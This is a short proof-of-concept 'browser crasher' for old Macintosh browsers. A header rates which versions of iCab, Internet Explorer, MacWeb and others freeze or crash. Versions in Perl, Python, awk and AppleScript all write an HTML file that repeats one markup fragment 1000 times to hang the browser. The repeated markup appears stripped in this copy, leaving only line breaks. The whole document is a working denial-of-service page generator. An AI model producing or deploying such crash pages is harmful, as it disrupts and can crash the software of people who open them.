;# Old Style Browser Crasher. ;# OK ;# WannaBe 1.0b11 (Always No damage, of course) ;# Netscape Communicator 4.* (No damage! Wow) ;# Netscape 1.12I (Slowish a little) ;# Opera 5.0.485 (Slowdown but safe) ;# NG ;# iCab 2.7.1 (Lost Control) ;# Internet Explorer 5.1.3(4012) (Drop in MacsBug and can not back to Finder) ;# MacWeb 1.00A3.2J1Apple (Print error 1000 lines in console window, and crash violently) #!/usr/bin/env perl open _, '> table1000.html' or die; print _ 'Very easy iCab Freezer ', '
' x 1000; close _; __END__ #!/usr/bin/env python _ = open('table1000.html', 'w') _.write('Very easy iCab Freezer\n' + '
' * 1000) _.close() import sys sys.exit() #!/usr/bin/env awk BEGIN { _ = "table1000.html"; print "Very easy iCab Freezer" > _; for (i = 0; i < 1000; i++) printf "
" >> _; exit; } (* AppleScript *) open for access file "table1000.html" with write permission returning _ write "Very easy iCab Freezer " to _ repeat 1000 times write "
" to _ end repeat close access _ (* END AppleScript *)